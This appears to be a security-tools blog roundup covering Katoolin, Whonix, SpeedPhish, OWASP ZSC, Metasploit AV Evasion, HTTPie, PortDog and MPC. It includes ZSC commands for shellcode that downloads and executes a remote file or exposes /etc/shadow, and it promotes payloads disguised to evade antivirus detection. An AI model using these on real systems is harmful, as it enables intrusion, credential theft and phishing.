Katoolin - Automatically install all Kali Linux tools

Automatically install all Kali linux tools

Features

• Add Kali linux repositories
• Remove kali linux repositorie
• Install Kali linux tools

Requirements

• Python 2.7
• An operating system (tested on Ubuntu)

Instalation

sudo su
git clone https://github.com/LionSec/katoolin.git && cp katoolin/katoolin.py /usr/bin/katoolin
chmod +x /usr/bin/katoolin
sudo katoolin

Video

Usage

• Just select the number of a tool to install it
• Press 0 to install all tools
• back : Go back
• gohome : Go to the main menu

Download Katoolin

Read More

Whonix v11 - Anonymous Operating System

Whonix is an operating system focused on anonymity, privacy and security. It’s based on the Tor anonymity network, Debian GNU/Linux and security by isolation. DNS leaks are impossible, and not even malware with root privileges can find out the user’s real IP.

Whonix consists of two parts: One solely runs Tor and acts as a gateway, which we call Whonix-Gateway. The other, which we call Whonix-Workstation, is on a completely isolated network. Only connections through Tor are possible.

Whonix for Qubes

https://www.whonix.org/wiki/Qubes

Whonix for KVM

https://www.whonix.org/wiki/KVM

Whonix for VirtualBox

https://www.whonix.org/wiki/VirtualBox

If you want to upgrade existing Whonix version using Whonix’s APT repository

Special instructions required:

https://www.whonix.org/wiki/Upgrading_Whonix_10_to_Whonix_11

Changelog between Whonix 10.0.0.5.5 and Whonix 11.0.0.2.3:

– fixed custom workstation build

– build script: refactoring, use errtrace rather than many traps – https://phabricator.whonix.org/T48

– build script: refactoring, use exit trap to reduce code duplication – https://phabricator.whonix.org/T269

– whonixcheck: warn if whonix-gateway / whonix-workstation package is not installed – https://phabricator.whonix.org/T264

– whonixcheck: warn if there is low entropy – https://phabricator.whonix.org/T202

– build, anon-apt-sources-list, anon-shared-build-apt-sources-tpo, whonix-repository: changed release codename from wheezy to jessie – https://phabricator.whonix.org/T270

– grub-enable-apparmor: Refactoring. Simplified for Debian jessie. Thanks to the new `/etc/default/grub.d` configuration folder, the `grub-enable-apparmor` has been greatly simplified. No longer need to config-package-dev divert `/etc/default/grub`.

– genmkfile: if debuild not available, recommend installation of the devscripts package

– build script: added fakeroot to whonix_build_script_build_dependency (required for verifiable builds)

– genmkfile: if debuild not available, recommend installation of the devscripts package

– genmkfile: fix, do not set automatically make_use_gain_root_command to true if fakeroot is not installed

– genmkfile: run dpkg-checkbuilddeps before lintian to show better hint if build dependencies are missing

– build script: build-steps.d/1200_create-debian-packages: commented out get_extra_packages, no longer need to download packages from testing

– build script: refactoring, created separate help step, help-steps/git_sanity_test

– whonixcheck: verbose output for check_tor_socks_port_reachability

– all packages: packaging, bumped Standards-Version from 3.9.4 to 3.9.6 for jessie support

– lintian warning copyright fix

– tb-updater: show “highest version number is not necessarily the best one” message also on first run if no Tor Browser is installed yet – https://phabricator.whonix.org/T283

– build script: No longer install acpi-support-base by default on jessie, because systemd now implements that functionality. – https://phabricator.whonix.org/T284

– whonixcheck: added link to Whonix Build Version documentation https://www.whonix.org/wiki/Whonixcheck#Whonix_Build_Version – https://phabricator.whonix.org/T276

– build script: Fix commit 287bdcf6ddee007ba579e3ee9a1997edc8188581 ‘”makefile: added –pedantic to default DEBUILD_LINTIAN_OPTS because we are going to fix the last remaining “missing upstream changelog” warning’ – added –pedantic help-steps/variables.

– all packages: added debian/source/lintian-overrides with debian-watch-may-check-gpg-signature to fix lintian warning – https://phabricator.whonix.org/T277

– whonix-setup-wizard, anon-gw-anonyminizer-config, whonixcheck, whonix-ws-start-menu-additions, whonix-host-firewall: added ‘Keywords=’ to ‘.desktop’ files to fix lintian warning ‘desktop-entry-lacks-keywords-entry’ – https://phabricator.whonix.org/T281

– anon-shared-helper scripts: replaced dependency ‘python-support (>= 0.90)’ with dh-python to fix lintian warning

– control-port-filter-python: packaging, use debhelper with python2 to fix lintian warning

– modify apt-get parameters during build to prevent need to remove apt-listchanges – https://phabricator.whonix.org/T282

– build-script: refactoring, moved variables DEBIAN_FRONTEND DEBIAN_PRIORITY DEBCONF_NOWARNINGS APT_LISTCHANGES_FRONTEND from help-steps/variables to buildconfig.d/30_apt_opts

– genmkfile: hint “Is the build dependency genmkfile installed?” if genmkfile is not installed

– genmkfile: hint ‘dpkg-parsechangelog not found. Do you have the “build-essential” package installed?’ if dpkg-parsechangelog is not available

– sdwdate: removed dependency on ruby1.9.1-dev to fix lintian warning ‘E: sdwdate: depends-on-obsolete-package depends: ruby1.9.1-dev’

– whonixcheck: show diagnostic message on whonixcheck Whonix News gpg verification failure by default

– build script: Fix building Whonix on Whonix, fix if `lsb_release –short –i` returns ‘Whonix’. Temp hack ‘export whonix_build_on_operating_system=”debian”‘ no longer required. Thanks to @nrgaway for the bug report and the analysis. – https://phabricator.whonix.org/T278

– tb-updater: tbbversion_installed parser fix

– anon-meta-packages: removed dependency on libupower-glib1 which is no longer available in Debian jessie (which has been replaced by upower, that already gets installed)

– anon-base-files, whonix-developer-meta-files: implemented WHONIX_BUILD_QUBES=true environment variable support – https://phabricator.whonix.org/T298

– anon-meta-packages: whonix-gateway and whonix-workstation package no longer depend on anon-shared-build-fix-grub because it has been made a weak dependency for better physical isolation and Qubes support

– code simplification, removed support for environment variable ANON_BUILD_INSTALL_TO_ROOT=true because anon-shared-build-fix-grub now gets only installed on required platforms

– implemented build parameter ‘–unsafe-io true’, that speeds up builds, that uses ‘-o Dpkg::Options::=–force-unsafe-io’, eatmydata and ignores ‘sync’. – Thanks to @nrgaway for the suggestion!  – https://phabricator.whonix.org/T295

– implemented $apt_misc_opts – https://phabricator.whonix.org/T295

– whonixcheck: new –verbose debug feature, showing output of systemd-detect-virt

– vbox-disable-timesync: more robust implementation that is compatible with systemd – https://phabricator.whonix.org/T106

– timesync: compatibility with systemd – https://phabricator.whonix.org/T106

– whonixcheck, msgdispatcher: ported to systemd – https://phabricator.whonix.org/T106

– qubes-whonix: skip rads on Qubes – https://phabricator.whonix.org/T306

– systemd unit files: workaround/fix, removed spaces from ‘WantedBy = ‘, likely bug in ‘deb-systemd-helper’ that prevents enabling the service by default – https://phabricator.whonix.org/T316

– created a hellodaemon package, useful for Debian systemd packaging debugging – not part of Whonix – https://github.com/adrelanos/hellodaemon

– whonixcheck: debian/control: fix, added to ‘Build-Depends:’ ‘ruby-ronn (>= 0.7.3)’

– disable torsocks warning spam – https://phabricator.whonix.org/T317

– whonix-libvirt: fixed CI builds

– whonix-libvirt: added driver name=’qemu’ – Thanks to HulaHoop! – https://github.com/Whonix/whonix-libvirt/pull/20 https://github.com/Whonix/whonix-libvirt/pull/19 https://github.com/Whonix/whonix-libvirt/pull/18

– anon-meta-packages: added obfs4proxy to anon-gateway-packages-recommended – https://phabricator.whonix.org/T323

– anon-meta-packages: added apt-transport-tor to anon-shared-packages-recommended – https://phabricator.whonix.org/T92

– whonix-gw-network-conf, whonix-ws-network-conf: Removed ‘pre-up /usr/bin/whonix_firewall’, because /etc/network/if-pre-up.d to load the firewall, because of a Debian upstream bug interface comes up even if a script in /etc/network/if-pre-up.d/ fails http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=700811 was fixed. – https://phabricator.whonix.org/T68

whonix-gw-firewall, whonix-ws-firewall, whonix-host-firewall: Made package more standalone. Requiring ‘pre-up /usr/bin/whonix_firewall’ in /etc/network/interfaces is no longer necessary. Added etc/network/if-pre-up.d/30_whonix_firewall to load the firewall, because of a Debian upstream bug ‘interface comes up even if a script in /etc/network/if-pre-up.d/ fails’ http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=700811 was fixed. – https://phabricator.whonix.org/T68

– whonixsetup, whonix-setup-wizard: fix ‘Tor fails after reload related to torrc DisableNetwork setting issue’ by only restarting Tor, no longer trying to reload Tor – https://phabricator.whonix.org/T320

– rads: Improved implementation. When there is enough RAM… On ‘enter’: instantly start login manager. On ‘ctrl + c’: instantly abort and do not start login manager. On ‘timeout’: start login manager. Thanks to ‘dh_systemd_start –no-start’ we can now use ‘StandardInput=tty’ and ‘read’ instead of ‘systemd-ask-password’. Now we could even implement an interactive menu at boot (that allows to configure wait time and/or disabling rads). – https://phabricator.whonix.org/T57

– whonixcheck: abolished random wait by default – https://phabricator.whonix.org/T299

– anon-ws-disable-stacked-tor: fixed ‘insserv: script tor.anondist-orig: service tor already provided!’ warning during upgrades – https://phabricator.whonix.org/T303

– anon-ws-disable-stacked-tor: systemd compatibility – https://phabricator.whonix.org/T303

– anon-base-files: no longer ‘set -o pipefail’ in /usr/lib/pre.bsh. config-package-dev doesn’t like ‘set -o pipefail’ – http://mailman.mit.edu/pipermail/config-package-dev/2015-May/000041.html – https://phabricator.whonix.org/T329

– upstream bug report: spaces in Tor’s systemd unit file causes issues – https://trac.torproject.org/projects/tor/ticket/16162

– upstream bug report: Tor dies on reload when swichting to ‘DisableNetwork 0’ when using ‘DnsPort 127.0.0.1:53’ – https://trac.torproject.org/projects/tor/ticket/16161

build script: fix, support ‘–verifiable false’ (was ‘–verifiable minimal’ while build documentation said ‘false’)

– uwt: multi user fix – https://www.whonix.org/forum/index.php/topic,1267

– Qubes: WiFi Realtek RTL8191SEvB Issue and Solution – https://groups.google.com/forum/#!topic/qubes-users/kMGTSwP72aU

– whonix-setup-wizard API proposal: https://www.whonix.org/wiki/Dev/whonixsetup

Download Whonix v11

Read More

SPF - SpeedPhish Framework

SPF (SpeedPhish Framework) is a python tool designed to allow for quick recon and deployment of simple social engineering phishing exercises.

Requirements:

• dnspython
• twisted
• PhantomJS

Usage:

usage: spf.py [-h] [-f <list.txt>] [-C <config.txt>] [--all] [--test] [-e]
              [-g] [-s] [--simulate] [-w] [-W] [-d <domain>]
              [-c <company's name>] [--ip <IP address>] [-v] [-y]

optional arguments:
  -h, --help           show this help message and exit
  -d <domain>          domain name to phish
  -c <company's name>  name of company to phish
  --ip <IP address>    IP of webserver defaults to [192.168.1.124]
  -v, --verbosity      increase output verbosity

input files:
  -f <list.txt>        file containing list of email addresses
  -C <config.txt>      config file

enable flags:
  --all                enable ALL flags... same as (-e -g -s -w)
  --test               enable all flags EXCEPT sending of emails... same as
                       (-e -g --simulate -w -y -v -v)
  -e                   enable external tool utilization
  -g                   enable automated gathering of email targets
  -s                   enable automated sending of phishing emails to targets
  --simulate           simulate the sending of phishing emails to targets
  -w                   enable generation of phishing web sites
  -W                   leave web server running after termination of spf.py

misc:
  -y                   automatically answer yes to all questions

Execution:

cd spf
python spf.py --test -d example.com

or to just test the websites:

cd spf
python web.py default.cfg

Misc

Video of sample usage

BsidesKnox 2015 video

Download SpeedPhish Framework

Read More

OWASP ZSC Shellcoder - Generate Customized Shellcodes

OWASP ZSC is an open source software in python language which lets you generate customized shellcodes for listed operation systems. This software can be run on Windows/Linux&Unix/OSX and others OS under python 2.7.x.

Description

Usage of shellcodes

Shellcodesare small codes in assembly which could be use as the payload in software exploiting. Other usages are in malwares, bypassing antiviruses, obfuscated codes and etc.

Why use OWASP ZSC ?

According to other shellcode generators same as metasploit tools and etc, OWASP ZSC using new encodes and methods which antiviruses won't detect. OWASP ZSC encoderes are able to generate shellcodes with random encodes and that's lets you to get thousands new dynamic shellcodes with same job in just a second,that means you will not get a same code if you use random encodes with same commands, And that make OWASP ZSC one of the bests! otherwise it's gonna generate shellcodes for many operation systems in next versions.

Help Menu

Switches:
-h, --h, -help, --help => to see this help guide
-os => choose your os to create shellcode
-oslist   => list os for switch -os
-o => output filename
-job => what shellcode gonna do for you ?
-joblist => list of -job switch
-encode => generate shellcode with encode
-types => types of encode for -encode switch
-wizard => wizard mod

-update => check for update
-about => about software and developers.

With these switch you can see the oslist,encode types and functions [joblist] to generate your shellcode.
OS List "-oslist"

[+] linux_x86
[+] linux_x64
[+] linux_arm
[+] linux_mips
[+] freebsd_x86
[+] freebsd_x64
[+] windows_x86
[+] windows_x64
[+] osx
[+] solaris_x86
[+] solaris_x64

Encode Types "-types"

[+] none
[+] xor_random
[+] xor_yourvalue
[+] add_random
[+] add_yourvalue
[+] sub_random
[+] sub_yourvalue
[+] inc
[+] inc_timesyouwant
[+] dec
[+] dec_timesyouwant
[+] mix_all

Functions "-joblist"

[+] exec('/path/file')
[+] chmod('/path/file','permission number')
[+] write('/path/file','text to write')
[+] file_create('/path/file','text to write')
[+] dir_create('/path/folder')
[+] download('url','filename')
[+] download_execute('url','filename','command to execute')
[+] system('command to execute')
[+] script_executor('name of script','path and name of your script in your pc','execute command')

Now you are able to choose your operation system, function, and encode to generate your shellcode, But all of these features are not activated yet, so you have to look up this table HERE to see what features are activated.

For example, this part of table telling us all functions for linux_x86 is activated, But Encodes [xor_random, xor_yourvalue, add_random, add_yourvalue, sub_random, sub_yourvalue, inc, inc_timesyouwant, dec, dec_timesyouwant] are just activated for chmod() function.

Examples

>zsc -os linux_x86 -encode inc -job "chmod('/etc/passwd','777')" -o file
>zsc -os linux_x86 -encode dec -job "chmod('/etc/passwd','777')" -o file
>zsc -os linux_x86 -encode inc_10 -job "chmod('/etc/passwd','777')" -o file
>zsc -os linux_x86 -encode dec_30 -job "chmod('/etc/passwd','777')" -o file
>zsc -os linux_x86 -encode xor_random -job "chmod('/etc/shadow','777')" -o file.txt
>zsc -os linux_x86 -encode xor_random -job "chmod('/etc/passwd','444')" -o file.txt
>zsc -os linux_x86 -encode xor_0x41414141 -job "chmod('/etc/shadow','777')" -o file.txt
>zsc -os linux_x86 -encode xor_0x45872f4d -job "chmod('/etc/passwd','444')" -o file.txt
>zsc -os linux_x86 -encode add_random -job "chmod('/etc/passwd','444')" -o file.txt
>zsc -os linux_x86 -encode add_0x41414141 -job "chmod('/etc/passwd','777')" -o file.txt
>zsc -os linux_x86 -encode sub_random -job "chmod('/etc/passwd','777')" -o file.txt
>zsc -os linux_x86 -encode sub_0x41414141 -job "chmod('/etc/passwd','444')" -o file.txt
>zsc -os linux_x86 -encode none -job "file_create('/root/Desktop/hello.txt','hello')" -o file.txt
>zsc -os linux_x86 -encode none -job "file_create('/root/Desktop/hello2.txt','hello[space]world[space]!')" -o file.txt
>zsc -os linux_x86 -encode none -job "dir_create('/root/Desktop/mydirectory')" -o file.txt
>zsc -os linux_x86 -encode none -job "download('http://www.z3r0d4y.com/exploit.type','myfile.type')" -o file.txt
>zsc -os linux_x86 -encode none -job "download_execute('http://www.z3r0d4y.com/exploit.type','myfile.type','./myfile.type')" -o file.txt
#multi command
>zsc -os linux_x86 -encode none -job "download_execute('http://www.z3r0d4y.com/exploit.type','myfile.type','chmod[space]777[space]myfile.type;sh[space]myfile.type')" -o file.txt
>zsc -os linux_x86 -encode none -job "script_executor('script.type','D:\\myfile.type','./script.type')" -o file.txt
>zsc -os linux_x86 -encode none -job "script_executor('z3r0d4y.sh','/root/z3r0d4y.sh','sh[space]z3r0d4y.sh')" -o file.txt
>zsc -os linux_x86 -encode none -job "script_executor('ali.py','/root/Desktop/0day.py','chmod[space]+x[space]ali.py;[space]python[space]ali.py')" -o file.txt
>zsc -os linux_x86 -encode none -job "system('ls')" -o file.txt
>zsc -os linux_x86 -encode none -job "system('ls[space]-la')" -o file.txt
>zsc -os linux_x86 -encode none -job "system('ls[space]-la[space]/etc/shadow;chmod[space]777[space]/etc/shadow;ls[space]-la[space]/etc/shadow;cat[space]/etc/shadow;wget[space]file[space];chmod[space]777[space]file;./file')" -o file.txt
>zsc -os linux_x86 -encode none -job "system('wget[space]file;sh[space]file')" -o file.txt
>zsc -os linux_x86 -encode none -job "chmod('/etc/shadow','777')" -o file.txt
>zsc -os linux_x86 -encode none -job "write('/etc/passwd','user:pass')" -o file.txt
>zsc -os linux_x86 -encode none -job "exec('/bin/bash')" -o file.txt

Note: Don’t use space ‘ ’ in system() function, replace it with “[space]” , software will detect and replace “ ” for you in shellcode.

Note: script_executor(),download_execute(),download(),dir_create(),file_create() are using linux command line , not the function. [wget,mkdir,echo] system() function added in script, you can use it to do anything and generate any command line shellcode.

Note: exec() doesn’t support any ARGV same as exec(‘/bin/bash -c ls’) or exec(‘/bin/bash’,‘-c’,‘ls’), you have to wait for next version and this feature will available in system()

Note: you also can use high value for inc and dec time, like inc_100000, your shellcode may get too big

Note: each time you execute chmod()[or any other] function with random encode, you are gonna get random outputs and different shellcode.

Note: your xor value could be anything. “xor_0x41414141” and “xor_0x45872f4d” are examples.

Wizard Switch

With -wizard switch you are able to generate shellcode without long ARGVs, software will ask you for information.

Note: While you are using -wizard switch, if you push “Enter” without typing anything, the default value will be set on the varible.

Note: With entering “list”, List of values will be shown.

Available Features

• add length calculator for output
• add filename writer in gcc commandline in output file
• fixed bug in encoding module not available.
• fixed bug in os module not available
• add “-wizard” switch
• add installer “use ‘zsc’ commandline in terminal after installed”
• add uninstaller
• This Software just could be run on linux since this version
• change output to .c file and automated shellcode generating
• add color output for termina
• add inc encoding chmod() [linux_x86]
• add inc_timesyouwant chmod() [linux_x86]
• add dec encoding chmod() [linux_x86]
• add dec_timesyouwant chmod() [linux_x86]
• add features table inside “features_table.html”
• add -about to menu for developers name and etc
• fixed permission number calculating in chmod() [linux_x86]
• software’s signature changes
• bug fix reported by user in executing on linux , color function
• add xor_random encoding chmod() [linux_x86]
• add xor_yourvalue encoding chmod() [linux_x86]
• add add_random encoding chmod() [linux_x86]
• add add_yourvalue encoding chmod() [linux_x86]
• add sub_random encoding chmod() [linux_x86]
• add sub_yourvalue encoding chmod() [linux_x86]
• fixed shellcode encode type checking
• [linux_x86 modules completed]
• add script_executor() [linux - using command execution]
• add download_execute() [linux_x86 - using command execution (wget)]
• add download() [linux_x86 - using command execution (wget)]
• add dir_create() [linux_x86 using command execution]
• add file_create() [linux_x86 using command execution]
• add encodes file for next version released
• add system() [linux_x86 command execute]
• fixed chmod filename ¼ char length [linux_x86]
• fixed exec filename ¼ char length [linux_x86]
• fixed write filename ¼ length [linux_x86]
• fixed write content ¼ length [linux_x86]
• fixed write length calculator [linux_x86]
• and fixed some other bugs in coding [core]
• system() function added in script, you can use it to do anything and generate any command line shellcode.
• add chmod() [linux_x86] -> chmod(‘/path/file’,‘perm_num’)
• add write() [linux_x86] -> write(‘/path/file’,‘content’)
• add exec() [linux_x86] -> exec(‘/path/file’)
• add encode [none - all os]
• add mix_all encoding in chmod() [linux_x86]
• add xor_random encoding in system() [linux_x86]
• add xor_yourvalue encoding in system() [linux_x86]
• add add_random encoding in system() [linux_x86]
• add add_yourvalue encoding in system() [linux_x86]
• add sub_random encoding in system() [linux_x86
• add sub_yourvalue encoding in system() [linux_x86]
• add inc encoding in system() [linux_x86]
• add inc_timesyouwant encoding in system() [linux_x86
• add dec encoding in system() [linux_x86]
• add dec_timesyouwant encoding in system() [linux_x86]
• add mix_all encoding in system() [linux_x86]
• add xor_random encoding in file_create() [linux_x86]
• add xor_yourvalue encoding in file_create() [linux_x86]
• add add_random encoding in file_create() [linux_x86]
• add add_yourvalue encoding in file_create() [linux_x86]
• add sub_random encoding in file_create() [linux_x86
• add sub_yourvalue encoding in file_create() [linux_x86]
• add inc encoding in file_create() [linux_x86]
• add inc_timesyouwant encoding in file_create() [linux_x86
• add dec encoding in file_create() [linux_x86]
• add dec_timesyouwant encoding in file_create() [linux_x86]
• add mix_all encoding in file_create() [linux_x86]
• add xor_random encoding in dir_create() [linux_x86]
• add xor_yourvalue encoding in dir_create() [linux_x86]
• add add_random encoding in dir_create() [linux_x86]
• add add_yourvalue encoding in dir_create() [linux_x86]
• add sub_random encoding in dir_create() [linux_x86
• add sub_yourvalue encoding in dir_create() [linux_x86]
• add inc encoding in dir_create() [linux_x86]
• add inc_timesyouwant encoding in dir_create() [linux_x86
• add dec encoding in dir_create() [linux_x86]
• add dec_timesyouwant encoding in dir_create() [linux_x86]
• add mix_all encoding in dir_create() [linux_x86]
• add xor_random encoding in download() [linux_x86]
• add xor_yourvalue encoding in download() [linux_x86]
• add add_random encoding in download() [linux_x86]
• add add_yourvalue encoding in download() [linux_x86]
• add sub_random encoding in download() [linux_x86
• add sub_yourvalue encoding in download() [linux_x86]
• add inc encoding in download() [linux_x86]
• add inc_timesyouwant encoding in download() [linux_x86
• add dec encoding in download() [linux_x86]
• add dec_timesyouwant encoding in download() [linux_x86]
• add mix_all encoding in download() [linux_x86]
• add xor_random encoding in download_execute() [linux_x86]
• add xor_yourvalue encoding in download_execute() [linux_x86]
• add add_random encoding in download_execute() [linux_x86]
• add add_yourvalue encoding in download_execute() [linux_x86]
• add sub_random encoding in download_execute() [linux_x86
• add sub_yourvalue encoding in download_execute() [linux_x86]
• add inc encoding in download_execute() [linux_x86]
• add inc_timesyouwant encoding in download_execute() [linux_x86
• add dec encoding in download_execute() [linux_x86]
• add dec_timesyouwant encoding in download_execute() [linux_x86]
• add mix_all encoding in download_execute() [linux_x86]
• add xor_random encoding in system() [linux_x86]
• add xor_yourvalue encoding in system() [linux_x86]
• add add_random encoding in system() [linux_x86]
• add add_yourvalue encoding in system() [linux_x86]
• add sub_random encoding in system() [linux_x86
• add sub_yourvalue encoding in system() [linux_x86]
• add inc encoding in system() [linux_x86]
• add inc_timesyouwant encoding in system() [linux_x86
• add dec encoding in system() [linux_x86]
• add dec_timesyouwant encoding in system() [linux_x86]
• add mix_all encoding in system() [linux_x86]
• add xor_random encoding in script_executor() [linux_x86]
• add xor_yourvalue encoding in script_executor() [linux_x86]
• add add_random encoding in script_executor() [linux_x86]
• add add_yourvalue encoding in script_executor() [linux_x86]
• add sub_random encoding in script_executor() [linux_x86
• add sub_yourvalue encoding in script_executor() [linux_x86]
• add inc encoding in script_executor() [linux_x86]
• add inc_timesyouwant encoding in script_executor() [linux_x86
• add dec encoding in script_executor() [linux_x86]
• add dec_timesyouwant encoding in script_executor() [linux_x86]
• add mix_all encoding in script_executor() [linux_x86]
• add add_random encoding in write() [linux_x86]
• add xor_random encoding in write() [linux_x86]
• add sub_random encoding in write() [linux_x86]
• add xor_random encoding in exec() [linux_x86]
• add sub_random encoding in exec() [linux_x86
• add add_random encoding in exec() [linux_x86]
• fixed bug in system() when len(command) is less than 5
• fixed bug in encode module add_random chmod() [linux_x86] 

Download OWASP ZSC

Read More

Metasploit AV Evasion - Metasploit payload generator that avoids most Anti-Virus products

Metasploit payload generator that avoids most Anti-Virus products.

Installing

git clone https://github.com/nccgroup/metasploitavevasion.git

chmod +x the avoid.sh file before use.

How To Use

./avoid.sh

Then follow the on screen prompts.

Features

• Easily generate a Metasploit executable payload to bypass Anti-Virus detection
• Local or remote listener generation
• Disguises the executable file with a PDF icon
• Executable opens minimised on the victims computer
• Automatically creates AutoRun files for CDROM exploitation

Download Metasploit AV Evasion

Read More

HTTPie - a CLI, cURL-like tool for humans

HTTPie (pronounced aych-tee-tee-pie) is a command line HTTP client. Its goal is to make CLI interaction with web services as human-friendly as possible. It provides a simple http command that allows for sending arbitrary HTTP requests using a simple and natural syntax, and displays colorized output. HTTPie can be used for testing, debugging, and generally interacting with HTTP servers.

HTTPie is written in Python, and under the hood it uses the excellent Requests and Pygments libraries.

Main Features

• Expressive and intuitive syntax
• Formatted and colorized terminal output
• Built-in JSON support
• Forms and file uploads
• HTTPS, proxies, and authentication
• Arbitrary request data
• Custom headers
• Persistent sessions
• Wget-like downloads
• Python 2.6, 2.7 and 3.x support
• Linux, Mac OS X and Windows support
• Plugins
• Documentation
• Test coverage

Installation

On Mac OS X, HTTPie can be installed via Homebrew:

$ brew install httpie

Most Linux distributions provide a package that can be installed using the system package manager, e.g.:

# Debian-based distributions such as Ubuntu:
$ apt-get install httpie

# RPM-based distributions:
$ yum install httpie

A universal installation method (that works on Windows, Mac OS X, Linux, …, and provides the latest version) is to use pip:

# Make sure we have an up-to-date version of pip and setuptools:
$ pip install --upgrade pip setuptools

$ pip install --upgrade httpie

(If pip installation fails for some reason, you can try easy_install httpie as a fallback.)

Development version
The latest development version can be installed directly from GitHub:

# Mac OS X via Homebrew
$ brew install httpie --HEAD

# Universal
$ pip install --upgrade https://github.com/jkbrzt/httpie/tarball/master

Usage

Hello World:

$ http httpie.org

Synopsis:

$ http [flags] [METHOD] URL [ITEM [ITEM]]

See also http --help.

Examples
Custom HTTP method, HTTP headers and JSON data:

$ http PUT example.org X-API-Token:123 name=John

Submitting forms:

$ http -f POST example.org hello=World

See the request that is being sent using one of the output options:

$ http -v example.org

Use Github API to post a comment on an issuewith authentication:

$ http -a USERNAME POST https://api.github.com/repos/jkbrzt/httpie/issues/83/comments body='HTTPie is awesome!'

Upload a file using redirected input:

$ http example.org < file.json

Download a file and save it via redirected output:

$ http example.org/file > file

Download a file wget style:

$ http --download example.org/file

Use named sessions to make certain aspects or the communication persistent between requests to the same host:

$ http --session=logged-in -a username:password httpbin.org/get API-Key:123$ http --session=logged-in httpbin.org/headers

Set a custom Host header to work around missing DNS records:

$ http localhost:8000 Host:example.com

---

What follows is a detailed documentation. It covers the command syntax, advanced usage, and also features additional examples.

HTTP Method

The name of the HTTP method comes right before the URL argument:

$ http DELETE example.org/todos/7

Which looks similar to the actual Request-Line that is sent:

DELETE /todos/7 HTTP/1.1

When the METHOD argument is omitted from the command, HTTPie defaults to either GET (with no request data) or POST (with request data).

Request URL

The only information HTTPie needs to perform a request is a URL. The default scheme is, somewhat unsurprisingly, http://, and can be omitted from the argument – http example.org works just fine.
Additionally, curl-like shorthand for localhost is supported. This means that, for example :3000 would expand to http://localhost:3000If the port is omitted, then port 80 is assumed.

$ http :/foo

GET /foo HTTP/1.1
Host: localhost

$ http :3000/bar

GET /bar HTTP/1.1
Host: localhost:3000

$ http :

GET / HTTP/1.1
Host: localhost

If you find yourself manually constructing URLs with querystring parameterson the terminal, you may appreciate the param==value syntax for appending URL parameters so that you don't have to worry about escaping the &separators. To search for HTTPie on Google Images you could use this command:

$ http GET www.google.com search==HTTPie tbm==isch

GET /?search=HTTPie&tbm=isch HTTP/1.1

Download HTTPie

Read More

A Cidade Mais Perigosa da Internet

Assista o documentário sobre cibercrime que apresenta a cidade romena chamada “Hackerville” ou a “Cidade mais perigosa da Internet”. Hackers blackhat condenados, como Guccifer (nome real), falam sobre worms, vírus, engenharia social, roubo de identidade e até sobre invadir o e-mail de Hillary Clinton.


By: OffensiveSec 2016

Read More

PortDog - Simple Python Script to Detect Port Scanning Techniques

PortDog is a network anomaly detector aimed to detect port scanning techniques. It is entirely written in python and has easy-to-use interface. It was tested on Ubuntu 15. Please note that, it is not working on Windows OS due to suffering from capturing RAW packets.I am working on to write this script to work both platforms. In future , I'am thinking about adding firewall options that could block malicious attempts. It is using Raw packets for analysis. For this reason, please ensure that you have run this script from privileged session.

Usage:

sudo python portdog.py -t time_for_sniff_in_minutes

For example, if you want to detect for 5 minutes use:

sudo python portdog.py -t 5

For infinite detection use:

sudo python portdog.py -t 0

If you want to get list of scanned ports , press CTRL+C to get port list at runtime (If scan was happened).

Download PortDog

Read More

MPC - Msfvenom Payload Creator

Msfvenom Payload Creator (MPC) is a wrapper to generate multiple types of payloads, based on users choice. The idea is to be as simple as possible (only requiring one input) to produce their payload.

Fully automating msfvenom & Metasploit is the end goal (well as to be be able to automate MPC itself). The rest is to make the user's life as easy as possible (e.g. IP selection menu, msfconsole resource file/commands, batch payload production and able to enter any argument in any order (in various formats/patterns)).

The only necessary input from the user should be defining the payload they want by either the platform (e.g. windows), or the file extension they wish the payload to have (e.g. exe).

• Can't remember your IP for a interface? Don't sweat it, just use the interface name: eth0.
• Don't know what your external IP is? MPC will discover it: wan.
• Want to generate one of each payload? No issue! Try: loop.
• Want to mass create payloads? Everything? Or to filter your select? ..Either way, its not a problem. Try: batch (for everything), batch msf (for every Meterpreter option), batch staged (for every staged payload), or batch cmd stageless (for every stageless command prompt)!

Note: This will not try to bypass any anti-virus solutions.

Install

• Designed for Kali Linux v1.1.0a+ & Metasploit v4.11+ (nothing else has been tested).

curl -k -L "https://raw.githubusercontent.com/g0tmi1k/mpc/master/mpc.sh" > /usr/bin/mpc
chmod +x /usr/bin/mpc
mpc

Help

root@kali:~# mpc -h -v
 [*] Msfvenom Payload Creator (MPC v1.3)

 [i] /usr/bin/mpc <TYPE> (<DOMAIN/IP>) (<PORT>) (<CMD/MSF>) (<BIND/REVERSE>) (<STAGED/STAGELESS>) (<TCP/HTTP/HTTPS/FIND_PORT>) (<BATCH/LOOP>) (<VERBOSE>)
 [i]   Example: /usr/bin/mpc windows 192.168.1.10        # Windows & manual IP.
 [i]            /usr/bin/mpc elf eth0 4444               # Linux, eth0's IP & manual port.
 [i]            /usr/bin/mpc stageless cmd py verbose    # Python, stageless command prompt.
 [i]            /usr/bin/mpc loop eth1                   # A payload for every type, using eth1's IP.
 [i]            /usr/bin/mpc msf batch wan               # All possible Meterpreter payloads, using WAN IP.
 [i]            /usr/bin/mpc help verbose                # This help screen, with even more information.

 [i] <TYPE>:
 [i]   + ASP
 [i]   + ASPX
 [i]   + Bash [.sh]
 [i]   + Java [.jsp]
 [i]   + Linux [.elf]
 [i]   + OSX [.macho]
 [i]   + Perl [.pl]
 [i]   + PHP
 [i]   + Powershell [.ps1]
 [i]   + Python [.py]
 [i]   + Tomcat [.war]
 [i]   + Windows [.exe]

 [i] Rather than putting <DOMAIN/IP>, you can do a interface and MPC will detect that IP address.
 [i] Missing <DOMAIN/IP> will default to the IP menu.

 [i] Missing <PORT> will default to 443.

 [i] <CMD> is a standard/native command prompt/terminal to interactive with.
 [i] <MSF> is a custom cross platform Meterpreter shell, gaining the full power of Metasploit.
 [i] Missing <CMD/MSF> will default to <MSF> where possible.
 [i]   Note: Metasploit doesn't (yet!) support <CMD/MSF> for every <TYPE> format.
 [i] <CMD> payloads are generally smaller than <MSF> and easier to bypass EMET. Limit Metasploit post modules/scripts support.
 [i] <MSF> payloads are generally much larger than <CMD>, as it comes with more features.

 [i] <BIND> opens a port on the target side, and the attacker connects to them. Commonly blocked with ingress firewalls rules on the target.
 [i] <REVERSE> makes the target connect back to the attacker. The attacker needs an open port. Blocked with engress firewalls rules on the target.
 [i] Missing <BIND/REVERSE> will default to <REVERSE>.
